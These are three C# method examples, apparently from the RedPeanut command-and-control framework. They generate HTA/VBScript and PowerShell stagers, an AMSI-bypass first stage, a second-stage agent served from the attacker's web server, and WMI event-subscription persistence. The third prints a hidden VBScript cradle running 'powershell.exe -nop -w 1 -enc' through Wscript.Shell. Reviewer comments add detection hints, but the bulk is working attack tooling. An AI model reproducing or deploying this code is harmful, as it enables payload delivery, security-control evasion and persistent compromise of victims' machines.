Ejemplo n.º 1
        // Builds a launcher for the stager in the language selected by `lang`
        // ("vbs" or "powershell"). With `hosted` set, the generated pieces are
        // registered as web resources on the C2 server; otherwise they are written
        // to the temp directory of the machine running this console.
        //
        // Nothing is built (and nothing is printed) when filename/lhost are empty,
        // lport/profile are below 1, or the profile id is not registered.
        //
        // Reviewer notes (defensive):
        //  - Artifacts: in the "powershell" branch the second stage is always named
        //    "s2_" + the first stage's random ".ps1" name and both live under the
        //    profile's ContentUri, so the stages appear as paired requests to the
        //    same host and URI prefix.
        //  - NOTE(review): `filename` reaches Path.Combine unvalidated; a rooted
        //    value or one containing separators would leave the temp directory.
        //    Confirm the caller constrains it.
        //  - NOTE(review): names come from `new Random()`, which is not a CSPRNG;
        //    they should not be treated as unguessable.
        //  - NOTE(review): the printed URL always says "https"; whether the listener
        //    really uses TLS is not visible in this method.
        private void Run()
        {
            // Not used anywhere in this method.
            List<string> args = new List<string>();

            try
            {
                bool missingInput = string.IsNullOrEmpty(filename) || string.IsNullOrEmpty(lhost) || lport < 1 || profile < 1;
                if (missingInput)
                {
                    return;
                }

                switch (lang)
                {
                    case "vbs":
                    {
                        string templateDir = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
                        if (!Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile))
                        {
                            // Unknown profile id: stop without any message.
                            return;
                        }

                        // Compile the stager template into a DLL under a random name.
                        // 35 is passed through to the replacer and builder; presumably a
                        // target framework version (not confirmed from this method).
                        ListenerConfig listener = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile);
                        string stagerSource = Replacer.ReplaceAgentProfile(
                            File.ReadAllText(Path.Combine(templateDir, STAGER_TEMPLATE)),
                            RedPeanut.Program.GetServerKey(),
                            35,
                            listener);
                        string stagerDllName = RandomAString(10, new Random()) + ".dll";
                        Builder.GenerateDll(stagerSource, stagerDllName, 35);

                        // The stager DLL is registered as a web resource even when `hosted` is false.
                        C2Manager c2manager = Program.GetC2Manager();
                        c2manager.GetC2Server().RegisterWebResource(stagerDllName, new WebResourceInstance(null, stagerDllName));

                        // Normalise the profile's content URI to "segment/.../" (no leading slash, one trailing slash).
                        string contentPrefix = Program.GetC2Manager().GetC2Server().GetProfile(profile).ContentUri.TrimStart('/');
                        if (!contentPrefix.EndsWith("/"))
                        {
                            contentPrefix += "/";
                        }

                        string stagerPath = contentPrefix + stagerDllName;

                        // The "shooter" template receives the stager's resource path and is compiled to base64.
                        string shooterSource = Replacer.ReplaceAgentShooter(
                            File.ReadAllText(Path.Combine(templateDir, SHOOTER_TEMPLATE)),
                            stagerPath,
                            listener);
                        string shooterBase64 = Builder.GenerateDllBase64(shooterSource, RandomAString(10, new Random()) + ".dll", 35);

                        HtaVBSGenerator launcher = new HtaVBSGenerator(shooterBase64, null);

                        if (!hosted)
                        {
                            // Local output: one file in the temp directory.
                            string outPath = Path.Combine(Path.GetTempPath(), filename);
                            File.WriteAllText(outPath, launcher.GetScriptText());
                            Console.WriteLine("[*] {0} Created", outPath);
                            return;
                        }

                        // Hosted output: serve the launcher under the operator-chosen name.
                        c2manager.GetC2Server().RegisterWebResource(filename, new WebResourceInstance(launcher, filename));
                        Console.WriteLine("[*] Resource added to webserver resources");
                        Console.WriteLine("[*] Starting point at https://{0}:{1}/{2}", lhost, lport, contentPrefix + filename);
                        return;
                    }

                    case "powershell":
                    {
                        string templateDir = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
                        if (!Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile))
                        {
                            // Unknown profile id: stop without any message.
                            return;
                        }

                        string psfilename = RandomString(10, new Random()) + ".ps1";
                        ListenerConfig listener = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile);
                        string stagerSource = Replacer.ReplaceAgentProfile(
                            File.ReadAllText(Path.Combine(templateDir, STAGER_TEMPLATE)),
                            RedPeanut.Program.GetServerKey(),
                            40,
                            listener);

                        string assemblyBase64 = Builder.GenerateDllBase64(stagerSource, RandomString(10, new Random()) + ".dll");

                        // Normalise the profile's content URI to "segment/.../".
                        string contentPrefix = Program.GetC2Manager().GetC2Server().GetProfile(profile).ContentUri.TrimStart('/');
                        if (!contentPrefix.EndsWith("/"))
                        {
                            contentPrefix += "/";
                        }

                        // Placeholders substituted into the cradle and AMSI-stage templates.
                        Dictionary<string, string> cradleArgs = new Dictionary<string, string>
                        {
                            { "#{lhost}", lhost },
                            { "#{lport}", lport.ToString() },
                            { "#{uri}", contentPrefix + "s2_" + psfilename }
                        };

                        // The agent template needs the uncompressed length next to the compressed blob.
                        byte[] rawAssembly = Convert.FromBase64String(assemblyBase64);
                        string compressedBase64 = Convert.ToBase64String(CompressAssembly(rawAssembly));

                        Dictionary<string, string> agentArgs = new Dictionary<string, string>
                        {
                            { "#{bytelen}", rawAssembly.Length.ToString() }
                        };

                        PowershellCradleGenerator cradle = new PowershellCradleGenerator(compressedBase64, cradleArgs);
                        PowershellAmsiGenerator stage1 = new PowershellAmsiGenerator(compressedBase64, cradleArgs);
                        PowershellAgentGenerator stage2 = new PowershellAgentGenerator(compressedBase64, agentArgs);

                        // The launcher wraps the cradle script text.
                        HtaPowerShellGenerator launcher = new HtaPowerShellGenerator(cradle.GetScriptText(), null);

                        if (!hosted)
                        {
                            // Local output: three files in the temp directory, written before anything is reported.
                            string launcherPath = Path.Combine(Path.GetTempPath(), filename);
                            File.WriteAllText(launcherPath, launcher.GetScriptText());
                            string stage1Path = Path.Combine(Path.GetTempPath(), psfilename);
                            File.WriteAllText(stage1Path, stage1.GetScriptText());
                            string stage2Path = Path.Combine(Path.GetTempPath(), "s2_" + psfilename);
                            File.WriteAllText(stage2Path, stage2.GetScriptText());

                            Console.WriteLine("[*] {0} Created", launcherPath);
                            Console.WriteLine("[*] {0} Created", stage1Path);
                            Console.WriteLine("[*] {0} Created", stage2Path);
                            return;
                        }

                        // Hosted output: launcher, first stage and "s2_" second stage become web resources.
                        C2Manager c2manager = Program.GetC2Manager();

                        c2manager.GetC2Server().RegisterWebResource(filename, new WebResourceInstance(launcher, filename));
                        c2manager.GetC2Server().RegisterWebResource(psfilename, new WebResourceInstance(stage1, psfilename));
                        c2manager.GetC2Server().RegisterWebResource("s2_" + psfilename, new WebResourceInstance(stage2, "s2_" + psfilename));
                        Console.WriteLine("[*] Resource added to webserver resources");
                        Console.WriteLine("[*] Starting point at https://{0}:{1}/{2}", lhost, lport, contentPrefix + filename);
                        return;
                    }

                    default:
                        Console.WriteLine("[*] Language not supported {0} (powershell,vbs)", lang);
                        return;
                }
            }
            catch (Exception e)
            {
                // Best-effort task: only the message is reported, the stack trace is dropped.
                Console.WriteLine("[*] Error running task build {0}", e.Message);
                return;
            }
        }
Ejemplo n.º 2
        // Registers two PowerShell stages for the current HTTP agent as web
        // resources, then fills PERSWMI_TEMPLATE with the event name, the first
        // stage's URL and the process name, compiles it, and hands the
        // gzip-compressed base64 assembly to RunAssemblyBase64 as module "PersWMI".
        //
        // Does nothing (silently) when processname or eventname is empty.
        //
        // Reviewer notes (defensive):
        //  - The template and ReplacePersWMI are not shown here; the names suggest
        //    WMI event-subscription persistence. If so, the resulting filter /
        //    consumer / binding creation is what Sysmon events 19-21 and the
        //    WMI-Activity operational log record on the target.
        //  - The two stages are served as "<name>.ps1" and "s2_<name>.ps1" under the
        //    profile's ContentUri, with <name> a lower-cased 10-character random
        //    string, so they appear as paired requests to the same prefix.
        //  - NOTE(review): `new Random()` is not a CSPRNG; the resource names should
        //    not be treated as unguessable.
        private void Run()
        {
            try
            {
                // Not used anywhere in this method.
                List<string> args = new List<string>();

                if (string.IsNullOrEmpty(processname) || string.IsNullOrEmpty(eventname))
                {
                    return;
                }

                string templateDir = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
                string filename = RandomAString(10, new Random()).ToLower();

                // The listener settings are taken from the agent this task runs against.
                AgentInstanceHttp httpAgent = (AgentInstanceHttp)agent;
                ListenerConfig listener = new ListenerConfig(
                    "",
                    httpAgent.GetAddress(),
                    httpAgent.GetPort(),
                    Program.GetC2Manager().GetC2Server().GetProfile(httpAgent.GetProfileid()),
                    httpAgent.GetProfileid());

                string stagerSource = Replacer.ReplaceAgentProfile(
                    File.ReadAllText(Path.Combine(templateDir, STAGER_TEMPLATE)),
                    RedPeanut.Program.GetServerKey(),
                    40,
                    listener);

                string assemblyBase64 = Builder.GenerateDllBase64(stagerSource, filename + ".dll");

                // The agent template needs the uncompressed length next to the compressed blob.
                byte[] rawAssembly = Convert.FromBase64String(assemblyBase64);
                string compressedBase64 = Convert.ToBase64String(CompressAssembly(rawAssembly));

                Dictionary<string, string> agentArgs = new Dictionary<string, string>
                {
                    { "#{bytelen}", rawAssembly.Length.ToString() }
                };

                // Normalise the profile's content URI to "segment/.../".
                string contentPrefix = Program.GetC2Manager().GetC2Server().GetProfile(httpAgent.GetProfileid()).ContentUri.TrimStart('/');
                if (!contentPrefix.EndsWith("/"))
                {
                    contentPrefix += "/";
                }

                Dictionary<string, string> stage1Args = new Dictionary<string, string>();
                stage1Args.Add("#{lhost}", httpAgent.GetAddress());
                stage1Args.Add("#{lport}", httpAgent.GetPort().ToString());
                stage1Args.Add("#{uri}", contentPrefix + "s2_" + filename + ".ps1");

                PowershellAmsiGenerator stage1 = new PowershellAmsiGenerator(compressedBase64, stage1Args);
                PowershellAgentGenerator stage2 = new PowershellAgentGenerator(compressedBase64, agentArgs);

                // Both stages are always hosted; this task has no write-to-disk mode.
                C2Manager c2manager = Program.GetC2Manager();

                c2manager.GetC2Server().RegisterWebResource(filename + ".ps1", new WebResourceInstance(stage1, filename + ".ps1"));
                c2manager.GetC2Server().RegisterWebResource("s2_" + filename + ".ps1", new WebResourceInstance(stage2, "s2_" + filename + ".ps1"));
                Console.WriteLine("[*] Resource added to webserver resources");

                // Scheme of the first-stage URL follows the task's `ssl` flag.
                string proto = ssl ? "https" : "http";

                string url = string.Format("{0}://{1}:{2}/{3}{4}", proto, httpAgent.GetAddress(), httpAgent.GetPort(), contentPrefix, filename + ".ps1");

                string persistenceSource = Replacer.ReplacePersWMI(
                    File.ReadAllText(Path.Combine(templateDir, PERSWMI_TEMPLATE)),
                    eventname,
                    url,
                    processname,
                    encoded);

                // Build, gzip and base64-encode the module before handing it over.
                var builtModule = Builder.BuidStreamAssembly(persistenceSource, RandomAString(10, new Random()).ToLower() + ".dll", 40, compprofile: CompilationProfile.Persistence);
                var packedModule = CompressGZipAssembly(builtModule);

                RunAssemblyBase64(
                    Convert.ToBase64String(packedModule),
                    "PersWMI",
                    new string[] { " " },
                    agent);

                return;
            }
            catch (Exception e)
            {
                // Best-effort task: only the message is reported, the stack trace is dropped.
                Console.WriteLine("[x] Error generating task {0}", e.Message);
            }
        }
Ejemplo n.º 3
        // Builds the two PowerShell stages for the given listener profile. With
        // `hosted` set they are registered as web resources and an example
        // VBScript cradle is printed; otherwise both stages are written to the
        // temp directory of the machine running this console.
        //
        // Nothing is built (and nothing is printed) when filename/lhost are empty,
        // lport/profile are below 1, or the profile id is not registered.
        //
        // Reviewer notes (defensive):
        //  - The printed cradle starts "powershell.exe -nop -w 1 -enc <blob>" through
        //    Wscript.Shell from a VBScript <script> block. That command line, and
        //    PowerShell spawned by a script host, is what process-creation and
        //    script-block logging would capture on a target.
        //  - The second stage is always "s2_" + filename under the profile's
        //    ContentUri, so the stages appear as paired requests to one prefix.
        //  - NOTE(review): `filename` reaches Path.Combine unvalidated; a rooted
        //    value or one containing separators would leave the temp directory.
        //    Confirm the caller constrains it.
        //  - NOTE(review): the printed URL always says "https"; whether the listener
        //    really uses TLS is not visible in this method.
        private void Run()
        {
            // Not used anywhere in this method.
            List<string> args = new List<string>();

            try
            {
                bool missingInput = string.IsNullOrEmpty(filename) || string.IsNullOrEmpty(lhost) || lport < 1 || profile < 1;
                if (missingInput)
                {
                    return;
                }

                // Load the .cs stager template and substitute its variables.
                string templateDir = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
                if (!Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile))
                {
                    // Unknown profile id: stop without any message.
                    return;
                }

                ListenerConfig listener = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile);
                string stagerSource = Replacer.ReplaceAgentProfile(
                    File.ReadAllText(Path.Combine(templateDir, STAGER_TEMPLATE)),
                    RedPeanut.Program.GetServerKey(),
                    40,
                    listener);

                // The operator-supplied filename doubles as the assembly name here.
                string assemblyBase64 = Builder.GenerateDllBase64(stagerSource, filename);

                // Normalise the profile's content URI to "segment/.../".
                string contentPrefix = Program.GetC2Manager().GetC2Server().GetProfile(profile).ContentUri.TrimStart('/');
                if (!contentPrefix.EndsWith("/"))
                {
                    contentPrefix += "/";
                }

                // Placeholders substituted into the cradle and AMSI-stage templates.
                Dictionary<string, string> cradleArgs = new Dictionary<string, string>
                {
                    { "#{lhost}", lhost },
                    { "#{lport}", lport.ToString() },
                    { "#{uri}", contentPrefix + "s2_" + filename }
                };

                // The agent template needs the uncompressed length next to the compressed blob.
                byte[] rawAssembly = Convert.FromBase64String(assemblyBase64);
                string compressedBase64 = Convert.ToBase64String(CompressAssembly(rawAssembly));

                Dictionary<string, string> agentArgs = new Dictionary<string, string>
                {
                    { "#{bytelen}", rawAssembly.Length.ToString() }
                };

                PowershellCradleGenerator cradle = new PowershellCradleGenerator(compressedBase64, cradleArgs);
                PowershellAmsiGenerator stage1 = new PowershellAmsiGenerator(compressedBase64, cradleArgs);
                PowershellAgentGenerator stage2 = new PowershellAgentGenerator(compressedBase64, agentArgs);

                if (!hosted)
                {
                    // Local output: both stages are written before anything is reported.
                    string stage1Path = Path.Combine(Path.GetTempPath(), filename);
                    File.WriteAllText(stage1Path, stage1.GetScriptText());
                    string stage2Path = Path.Combine(Path.GetTempPath(), "s2_" + filename);
                    File.WriteAllText(stage2Path, stage2.GetScriptText());

                    Console.WriteLine("[*] {0} Created", stage1Path);
                    Console.WriteLine("[*] {0} Created", stage2Path);
                    return;
                }

                // Hosted output: serve both stages, then print the entry URL and a sample cradle.
                C2Manager c2manager = Program.GetC2Manager();

                c2manager.GetC2Server().RegisterWebResource(filename, new WebResourceInstance(stage1, filename));
                c2manager.GetC2Server().RegisterWebResource("s2_" + filename, new WebResourceInstance(stage2, "s2_" + filename));
                Console.WriteLine("[*] Resource added to webserver resources");
                Console.WriteLine("[*] Starting point at https://{0}:{1}/{2}", lhost, lport, contentPrefix + filename);
                Console.WriteLine("[*]");
                Console.WriteLine("[*] Cradle example");
                Console.WriteLine("[*]");
                Console.WriteLine("<script language = \"VBScript\">");
                Console.WriteLine("    Function etaget()");
                Console.WriteLine("");
                Console.WriteLine("        Dim ahsten");
                Console.WriteLine("        Set ahsten = CreateObject(\"Wscript.Shell\")");
                // The cradle generator's script text is placed after -enc.
                Console.WriteLine("        ahsten.run \"powershell.exe -nop -w 1 -enc {0}\", 0, true", cradle.GetScriptText());
                Console.WriteLine("    End Function");
                Console.WriteLine("");
                Console.WriteLine("    etaget");
                Console.WriteLine("    self.close");
                Console.WriteLine("</script>");
                Console.WriteLine("[*]");
                return;
            }
            catch (Exception e)
            {
                // Best-effort task: only the message is reported, the stack trace is dropped.
                Console.WriteLine("[*] Error running task build {0}", e.Message);
                return;
            }
        }